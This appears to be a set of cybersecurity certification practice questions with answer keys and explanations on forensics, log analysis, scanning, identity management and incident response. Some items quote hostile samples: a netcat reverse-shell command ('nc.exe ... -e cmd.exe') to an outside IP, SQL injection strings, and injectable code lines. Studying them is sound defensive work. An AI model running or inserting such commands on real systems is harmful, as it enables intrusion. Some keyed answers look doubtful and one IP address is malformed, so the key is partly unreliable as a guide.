B. Suspend the machine and copy the contents of the directory it resides in The best option is to suspend the machine and copy the directory contents as long as you ensure you protect the integrity of the files by conducting a hash on them before and after copying the files. This procedure will store the virtual machine's RAM and disk contents. Since a virtual machine stores all of its data in a single file/folder on a host's hard drive, copying the entire folder will give all the information needed. Still, the virtual machine should not be powered off, and creating a copy of the drive is unnecessary because the files would still have to be validated. Live acquisition relies on a specialist hardware or software tool that can capture memory contents while the computer is running. This is unnecessary for a virtual machine since suspending a virtual machine writes the entire memory contents to a file on the hard disk. Shutting down the machine is a bad idea since this runs the risk that the malware will detect the shutdown process and perform anti-forensics to remove traces of itself. While you could image the entire drive the virtual machine resides on, it is unnecessary, will take much longer, and requires you to shut down the host machine to conduct the bit-by-bit copy.

A cybersecurity analyst is analyzing an employee's workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output: Proto Local Address Foreign address State TCP 0.0.0.0:53 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED TCP 192.168.1.4:59522 96.16.53.227.67:443 ESTABLISHED TCP 192.168.1.4:59523 96.16.53.227.67:443 ESTABLISHED TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED Based on this output, which of the following entries is suspicious? (SELECT THREE) A. TCP 0.0.0.0:135 0.0.0.0:0 LISTENING B. TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED C. TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED D. TCP 0.0.0.0:53 0.0.0.0:0 LISTENING E. TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED F. TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT

B. TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED D. TCP 0.0.0.0:53 0.0.0.0:0 LISTENING F. TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used for DNS servers to receive requests, and an employee's workstation running DNS would be unusual. If the Foreign Address uses port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high number port to a web server (port 80 and port 443) are normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high number port chosen by the workstation to conduct two-way communications.

You need to perform an architectural review and select a view that focuses on the technologies, settings, and configurations used within the architecture. Which of the following views should you select? A. Logical view B. Technical view C. Operational view D. Acquisition view

B. Technical view A technical view focuses on technologies, settings, and configurations. An operational view looks at how a function is performed or what it accomplishes. A logical view describes how systems interconnect. An acquisition view focuses on the procurement process.

You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacon's behavior on the network? A. The beaconing interval B. The beacon's protocol C. The removal of known traffic D. The beacon's persistence

B. The beacon's protocol The beacon's protocol is not typically a means of identifying a malware beacon. A beacon can be sent over numerous protocols, including ICMP, DNS, HTTP, and numerous others. Unless you specifically knew the protocol being used by the suspected beacon, filtering out beacons by the protocol seen in the logs could lead you to eliminate malicious behavior prematurely.

You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code: sc config schedule start auto net start schedule at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe" What BEST describes what is occurring and what action do you recommend to stop it? A. The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network B. The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network C. The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; no recommendation is required since this is not malicious activity D. The host is beaconing to 123.12.34.12 every day at 10:42 by running nc.exe from the temp directory; you should recommend removing the host from the network

B. The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network

Which of the following is NOT a valid reason to conduct reverse engineering? A. To allow an attacker to spot vulnerabilities in an executable B. To allow the software developer to spot flaws in their source code C. To determine how a piece of malware operates D. To commit industrial espionage

B. To allow the software developer to spot flaws in their source code

What kind of security vulnerability would a newly discovered flaw in a software application be considered? A. HTTP header injection vulnerability B. Zero-day vulnerability C. Input validation flaw D. Time-to-check to time-to-use flaw

B. Zero-day vulnerability

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? A. wget B. ftp C. netcat D. telnet

B. ftp FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

Raj is working to deploy a new vulnerability scanner for an organization. He wants to verify the information he gets is the most accurate view of the configurations on the organization's traveling salespeople's laptops to determine if any configuration issues could lead to new vulnerabilities. Which of the following technologies would work BEST to collect the configuration information in this situation? A. Server-based scanning B. Non-credentialed scanning C. Agent-based scanning D. Passive network monitoring

C. Agent-based scanning Using agent-based scanning, you typically get the most reliable results for systems that are not connected to the network, as well as the ones that are connected. This is ideal for traveling salespeople since their laptops are not constantly connected to the organization's network. These agent-based scans can be conducted when the laptop is offline and then sent to a centralized server the next time it is connected to the network. Server-based scanning, non-credentialed scanning, and passive network monitoring require a continuous network connection to collect the devices' configurations accurately.

While conducting a static analysis source code review of a program, you see the following line of code: String query = "SELECT * FROM CUSTOMER WHERE CUST_ID=' " + request.getParameter("id") + " ' "; What is the largest security issue with this line of code? A. The * operator will allow retrieval of every data field about this customer in the CUSTOMER table B. This code is vulnerable to a buffer overflow attack C. An SQL injection could occur because input validation is not being used on the id parameter D. The code is using parameterized queries

C. An SQL injection could occur because input validation is not being used on the id parameter This code takes the input of "id" directly from a user or other program without conducting any input validation. This could be exploited and used as an attack vector for an SQL injection. If a malicious user can alter the ID source, it might get replaced with something like ' or '1'='1. This will cause the SQL statement to become: "SELECT * FROM CUSTOMER WHERE CUST_ID='' or '1'='1'". Because '1' always equals '1', the where clause will always return 'true,' meaning that EVERY record in the database could now become available to the attacker. When creating SQL statements, there are reasons for and against the use of the * operator. Its presence alone does not necessarily indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow attack. You do not see the declaration values for the initialization of the id variable. This code is not using parameterized queries, but if it did, then it would eliminate this vulnerability. A parameterized query is a type of output encoding that relies on prepared statements to reduce the risk of an SQL injection.

You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that the file's data fragments exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data? A. Overwrite B. Hashing C. Carving D. Recovery

C. Carving File carving is the process of extracting data from an image when that data has no associated file system metadata. A file-carving tool analyzes the disk at the sector/page level. It attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files or at least bits of information from deleted files. File carving depends heavily on file signatures or magic numbers—the sequence of bytes at the start of each file identifies its type. Hashing is a function that converts an arbitrary length string input to a fixed-length string output. Overwrite is a method of writing random bits or all zeros over a hard disk to sanitize it. Recovery is a generic term in forensics, cybersecurity incident response, and other portions of the IT industry, therefore it is not specific enough to be the correct option.

Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets? A. Employee workstations B. On-premise servers C. Cloud services D. Mobile devices

C. Cloud services

A vulnerability scan has returned the following results: Detailed Results 10.56.17.21 (APACHE-2.4) Windows Shares Category: Windows CVE ID: - Vendor Ref: - Bugtraq ID: - Service Modified - 8.30.2017 Enumeration Resulted: print$ c:\windows\system32\spool\drivers files c:\FileShare\Accounting Temp c:\temp What best describes the meaning of this output? A. Windows Defender has a known exploit that must be resolved or patched B. There is an unknown bug in an Apache server with no Bugtraq ID C. Connecting to the host using a null session allows enumeration of the share names on the host D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server

C. Connecting to the host using a null session allows enumeration of the share names on the host These results from the vulnerability scan conducted show an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.

You have just returned from a business trip to a country with a high intellectual property theft rate. Which of the following precautions should you take before reconnecting your laptop to your corporate network? (SELECT TWO) A. The laptop's hard drive should have full-disk encryption enabled B. The laptop should be permanently destroyed C. The laptop should be physically inspected and compared with images made before you left D. The laptop's hard drive should be degaussed before use E. The laptop should be sanitized and reimaged F. The laptop should be scanned for malware

C. The laptop should be physically inspected and compared with images made before you left F. The laptop should be scanned for malware

Jay is replacing his organization's current vulnerability scanner with a new tool. As he begins to create the scanner's configurations and scanning policy, he notices a conflict in the settings recommended between different documents. Which of the following sources must Jay follow when trying to resolve these conflicts? A. Configuration settings from the prior system B. NIST guideline documents C. Corporate policy D. Vendor best practices

C. Corporate policy Policies are formalized statements that apply to a specific area or task. Policies are mandatory, and employees who violate a policy may be disciplined. Guidelines are general, non-mandatory recommendations. Best practices are considered procedures that are accepted as being correct or most effective but are not mandatory to be followed. Configuration settings from the prior system could be helpful, but this is not a mandatory compliance area like a policy. Therefore, Jay should first follow the policy before the other three options if there is a conflict.

Which of the following is a senior role with the ultimate responsibility for maintaining confidentiality, integrity, and availability in a system? A. Data custodian B. Data steward C. Data owner D. Privacy officer

C. Data owner A data owner is responsible for the confidentiality, integrity, availability, and privacy of information assets. They are usually senior executives, with the authority over and responsibility for the data.

You have been asked to provide some training to Dion Training's system administrators about the importance of proper patching of a system before deployment. To demonstrate the effects of deploying a new system without patching it first, you ask the system administrators to provide you with an image of a brand-new server they plan to deploy. How should you deploy the image to demonstrate the vulnerabilities exposed while maintaining the security of the corporate network? A. Deploy the vulnerable image to a virtual machine on a physical server, create an ACL to restrict all incoming connections to the system, then scan it for vulnerabilities B. Deploy the image to a brand new physical server, connect it to the corporate network, then conduct a vulnerability scan to demonstrate how many vulnerabilities are now on the network C. Deploy the system image within a virtual machine, ensure it is in an isolated sandbox environment, then scan it for vulnerabilities D. Utilize a server with multiple virtual machine snapshots installed on it, restore from a known compromised image, then scan it for vulnerabilities

C. Deploy the system image within a virtual machine, ensure it is in an isolated sandbox environment, then scan it for vulnerabilities

Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented? A. Rigorous user acceptance testing B. Peer review of source code C. Formal methods of verification D. DevSecOps

C. Formal methods of verification Formal verification methods use a mathematical model of the inputs and outputs of a system to prove that the system works as specified in all cases. Given the level of certainty achieved through formal verification methods, this approach provides the single greatest mitigation against this threat. Formal methods are designed for use in critical software in which corner cases must be eliminated. For example, what should the car do if a child jumps out in front of it, and the only way to avoid the child is to swerve off the road (which might kill the driver)? This is a classic corner case that needs to be considered for a self-driving car. User acceptance testing (UAT) is a beta phase of software testing. When the developers have tested the software, it is installed to a limited set of users who follow test schemes and report findings. DevSecOps is a combination of software development, security operations, and systems operations and integrates each discipline with the others. Peer review of source code allows for the review of uncompiled source code by other developers. While DevSecOps, peer review, and user acceptance testing help bring down the system's risk, only a formal method of verification could limit the liability involved with such a critical application as a self-driving car.

You have just received some unusual alerts on your SIEM dashboard and want to collect the payload associated with it. Which of the following should you implement to effectively collect these malicious payloads that the attackers are sending towards your systems without impacting your organization's normal business operations? A. Jumpbox B. Sandbox C. Honeypot D. Containerization

C. Honeypot A honeypot is a host set up to lure attackers away from the actual network components and/or discover attack strategies and weaknesses in the security configuration. A jumpbox is a hardened server that provides access to other hosts. A sandbox is a computing environment isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Containerization is a type of virtualization applied by a host operating system to provide an isolated execution environment for an application.

Which of the following is not considered a component that belongs to the category of identity management infrastructure? A. Auditing system B. LDAP C. Human resource system D. Provisioning engine

C. Human resource system

Which type of monitoring would utilize a network tap? A. Router-based B. Active C. Passive D. SNMP

C. Passive Network taps are devices that allow a copy of network traffic to be captured for analysis. They conduct passive network monitoring and visibility without interfering with the network traffic itself.

You are reviewing the logs in your HIDS and see entries showing SYN packets received from a remote host targeting each port on your web server from 1 to 1024. Which of the following MOST likely occurred? A. UDP probe B. The remote host cannot find the right service port C. Port scan D. SYN flood

C. Port scan Based on the description provided, this is most likely a port scan. Using a tool like nmap, an attacker can create a SYN scan across every port in the range against the desired target. A port scan or SYN scan may trigger an alert in your IDS. While scanners support more stealthy scans, default scans may connect to each port sequentially. The other options are incorrect because a remote host will typically connect to only a single port associated with a service. A SYN flood normally sends many SYNs to a single system. Still, it doesn't send them to unused ports, and a UDP probe will not send SYN packets.

Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? A. Autoruns B. ProcDump C. Process Monitor D. DiskMon

C. Process Monitor Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. Autoruns shows you what programs are configured to run during system bootup or login. ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. DiskMon is an application that logs and displays all hard disk activity on a Windows system. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

Fail To Pass Systems has just been the victim of another embarrassing data breach. Their database administrator needed to work from home this weekend, so he downloaded the corporate database to his work laptop. On his way home, he left the laptop in an Uber, and a few days later, the data was posted on the internet. Which of the following mitigations would have provided the greatest protection against this data breach? A. Require data masking for any information stored in the database B. Require a VPN to be utilized for all telework employees C. Require data at rest encryption on all endpoints D. Require all new employees to sign an NDA

C. Require data at rest encryption on all endpoints

You are reviewing the IDS logs and notice the following log entry: (where [email protected] and password=' or 7==7') What type of attack is being performed? A. XML injection B. Header manipulation C. SQL injection D. Cross-site scripting

C. SQL injection SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. The injection of unintended XML content and/or structures into an XML message can alter the application's intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

A forensics team follows documented procedures while investigating a data breach. The team is currently in the first phase of its investigation. Which of the following processes would they perform during this phase? A. Document and prove the integrity of evidence B. Create a report of the methods and tools used C. Secure the scene to prevent contamination of evidence D. Make a copy of the evidence

C. Secure the scene to prevent contamination of evidence

Which type of personnel control is being implemented if Kirsten must receive and inventory any items that her coworker, Bob, orders? A. Background checks B. Mandatory vacation C. Separation of duties D. Dual control

C. Separation of duties

Which of the following techniques would be the most appropriate solution for implementing a multi-factor authentication system? A. Username and password B. Fingerprint and retinal scan C. Smartcard and PIN D. Password and security question

C. Smartcard and PIN

Which of the following will an adversary do during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE) A. A backdoor/implant is placed on a victim's client B. Select backdoor implant and appropriate command and control infrastructure for operation C. Take advantage of a software, hardware, or human vulnerability D. Wait for a user to click on a malicious link E. A webshell is installed on a web server F. Wait for a malicious email attachment to be opened

C. Take advantage of a software, hardware, or human vulnerability D. Wait for a user to click on a malicious link F. Wait for a malicious email attachment to be opened

An attacker has compromised a virtualized server. You are conducting forensic analysis as part of the recovery effort but found that the attacker deleted a virtual machine image as part of their malicious activity. Which of the following challenges do you now have to overcome as part of the recovery and remediation efforts? A. File formats used by some hypervisors cannot be analyzed with traditional forensic tools B. All log files are stored within the VM disk image, therefore, they are lost C. The attack widely fragmented the image across the host file system D. You will need to roll back to an early snapshot and then merge any checkpoints to the main image

C. The attack widely fragmented the image across the host file system Due to the VM disk image's deletion, you will now have to conduct file carving or other data recovery techniques to recover and remediate the virtualized server. If the server's host uses a proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The attacker may have widely fragmented the image across the host file system when they deleted the disk image. VM instances are most useful when they are elastic (meaning they optimally spin up when needed) and then destroyed without preserving any local data when security has performed the task, but this can lead to the potential of lost system logs. To prevent this, most VMs also save their logs to an external Syslog server or file. Virtual machine file formats are image-based and written to a mass storage device. Depending on the configuration and VM state, security must merge any checkpoints to the main image, using a hypervisor tool, not recovery from an old snapshot, and then roll forward. It is possible to load VM data into a memory analysis tool, such as Volatility. However, some hypervisors' file formats require conversion first, or they may not support the analysis tool.

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store's IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions? A. These devices are insecure and should be isolated from the internet B. There are no new risks due to the install and the company has a stronger physical security posture C. These devices should be isolated from the rest of the enterprise network D. These devices should be scanned for viruses before installation

C. These devices should be isolated from the rest of the enterprise network

Which of the following is not normally part of an endpoint security suite? A. Software firewall B. Anti-virus C. VPN D. IPS

C. VPN Endpoint security includes software host-based firewalls, host-based intrusion protection systems (HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is a network security tool.

Barrett needs to verify settings on a macOS computer to ensure that the configuration he expects is currently set on the system. What type of file is commonly used to store configuration settings for a macOS system? A. The registry B. .config files C. plists D. .profile files

C. plists

Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and provide the ability to remotely wipe corporate information without affecting the user's personal data? A. Face ID B. Long and complex passwords C. Touch ID D. Containerization

D. Containerization Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user's personal accounts, apps, and data. This technology creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.

Fail to Pass Systems has recently moved its corporate offices from France to Westeros, a country with no meaningful privacy regulations. The marketing department believes that this move will allow the company to resell all of its customers' data to third-party companies and shield the company from any legal responsibility. Which policy is violated by this scenario? A. Data enrichment B. Data minimization C. Data limitation D. Data sovereignty

D. Data sovereignty While the fictitious Westeros may have no privacy laws or regulations, the laws of the countries where the company's customers reside may still retain sovereignty over the data obtained from those regions during the company's business there. This is called Data Sovereignty. Data sovereignty refers to a jurisdiction (such as France or the European Union) preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Data sovereignty may demand certain concessions on your part, such as using location-specific storage facilities in a cloud service. Fail to Pass Systems will likely face steep fines from different regions if they go through with their plan to sell all of their customers' data to the highest bidders. Fail to Pass Systems may even be blocked from communicating with individual regions. Although Data minimization and data limitation policies may be violated depending on the company's internal policies, these policies are not legally binding like the provisions of GDPR are. Data enrichment means that the machine analytics behind the view of a particular alert can deliver more correlating and contextual information with a higher degree of confidence, both from within the local network's data points and from external threat intelligence.

In which phase of the security intelligence cycle is input collected from intelligence producers and consumers to improve the implementation of intelligence requirements? A. Analysis B. Dissemination C. Collection D. Feedback

D. Feedback

You are conducting static analysis of an application's source code and see the following: (STRING) page += "<type name='id' type='INT' value='" + request.getParameter("ID") + "'>"; Based on this code snippet, which of the following security flaws exists in this application? A. Race condition B. Improper error handling C. Insufficient logging and monitoring D. Improper input validation

D. Improper input validation

You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first? A. Image of the server's SSD B. ARP cache C. Backup tapes D. L3 cache

D. L3 cache

Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution? A. SAML B. ADFS C. Kerberos D. OpenID Connect

D. OpenID Connect OAuth 2 is explicitly designed to authorize claims and not to authenticate users. The implementation details for fields and attributes within tokens are not defined. OpenID Connect (OIDC) is an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields. Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is an XML-based markup language for security assertions. Active Directory Federation Services (ADFS) is a software component developed by Microsoft that can run on Windows Server operating systems to provide users with single sign-on access to systems and applications located across organizational boundaries. Kerberos is a computer network authentication protocol that works based on tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

Marta's organization is concerned that a user's account could remain vulnerable for an extended period of time if its password were compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability? A. Minimum password length B. Password history C. Password complexity D. Password expiration

D. Password expiration

You have just completed identifying, analyzing, and containing an incident. You have verified that the company uses self-encrypting drives as part of its default configuration. As you begin the eradication and recovery phase, you must sanitize the storage devices' data before restoring the data from known-good backups. Which of the following methods would be the most efficient to use to sanitize the affected hard drives? A. Incinerate and replace the storage devices B. Conduct zero-fill on the storage devices C. Use a secure erase (SE) utility on the storage devices D. Perform a cryptographic erase (CE) on the storage devices

D. Perform a cryptographic erase (CE) on the storage devices Sanitizing a hard drive can be done using cryptographic erase (CE), secure erase (SE), zero-fill, or physical destruction. In this case, the hard drives are self-encrypting, so their data is already encrypted at rest. Therefore, the most efficient method would be to choose CE. The cryptographic erase (CE) method sanitizes a self-encrypting drive by erasing the media encryption key and then reimaging the drive. A secure erase (SE) is used to perform the sanitization of flash-based devices (such as SSDs or USB devices) when cryptographic erase is not available. The zero-fill method relies on overwriting a storage device by setting all bits to the value of zero (0), but this is not effective on SSDs or hybrid drives, and it takes much longer than the CE method. The final option is to conduct physical destruction, but since the scenario states that the storage device will be reused, this is not a valid technique. Physical destruction occurs by mechanical shredding, incineration, or degaussing magnetic hard drives.

During which phase of the incident response process does an organization assemble an incident response toolkit? A. Detection and analysis B. Containment, eradication, and recovery C. Post-incident activity D. Preparation

D. Preparation During the preparation phase, the incident response team conducts training, prepares their incident response kits, and researches threats and intelligence. During the detection and analysis phase, an organization focuses on monitoring and detecting any possible malicious events or attacks.

Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital's enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend? A. Recommend immediate disconnection of the elevator's control system from the enterprise network B. Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack C. Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists D. Recommend isolation of the elevator control system from the rest of the production network through the change control process

D. Recommend isolation of the elevator control system from the rest of the production network through the change control process

Dion Training's security team recently discovered a bug in their software's code. The development team released a software patch to remove the vulnerability caused by the bug. What type of test should a software tester perform on the application to ensure that it is still functioning properly after the patch is installed? A. User acceptance testing B. Fuzzing C. Penetration testing D. Regression testing

D. Regression testing Regression testing is re-running functional and non-functional tests to ensure that previously developed and tested software still performs after a change. After installing any patch, it is important to conduct regression testing to confirm that a recent program or code change has not adversely affected existing features or functionality. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User acceptance testing is a test conducted to determine if the specifications or contract requirements have been met. A penetration test is an authorized simulated cyberattack on a computer system, performed to evaluate the system's security.

Which of the following does a User-Agent request a resource from when conducting a SAML transaction? A. Single sign-on (SSO) B. Relying party (RP) C. Identity provider (IdP) D. Service provider (SP)

D. Service provider (SP) Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal's User Agent (typically a browser) requests a resource from the service provider (SP).

Mark works as a Department of Defense contracting officer and needs to ensure that any network devices he purchases for his organization's network are secure. He utilizes a process to verify the chain of custody for every chip and component used in the device's manufacture. What program should Mark utilize? A. Gray market procurement B. White market procurement C. Chain of procurement D. Trusted Foundry

D. Trusted Foundry The US Department of Defense (DoD) has set up a Trusted Foundry Program, operated by the Defense Microelectronics Activity (DMEA). Accredited suppliers have proved themselves capable of operating a secure supply chain, from design to manufacture and testing. The Trusted Foundry program helps assure the integrity and confidentiality of circuits and their manufacturing.

Riaan's company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated? A. IPS B. Encryption C. Vulnerability scanning D. WAF

D. WAF WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated.

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? A. Nothing can be determined about this site with the information provided B. The scan will not produce any useful information C. The server assumes you are conducting a DDoS attack D. You are scanning a CDN-hosted copy of the site

D. You are scanning a CDN-hosted copy of the site This result is due to the company using a distributed server model that hosts content on Edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the Edge server's cache or pull the content from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.

You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it? A. sc B. services.msc C. wmic D. secpol.msc

D. secpol.msc The security policy auditor (secpol.msc) will allow an authorized administrator the option to change a great deal about an operating system, but it cannot explicitly stop a process or service that is already running. The sc.exe command allows an analyst to control services, including terminating them. The Windows Management Instrumentation (wmic) can terminate a service using the following: wmic service <ServiceName> call StopService. The services.msc tool can also enable, start, or terminate a running service.
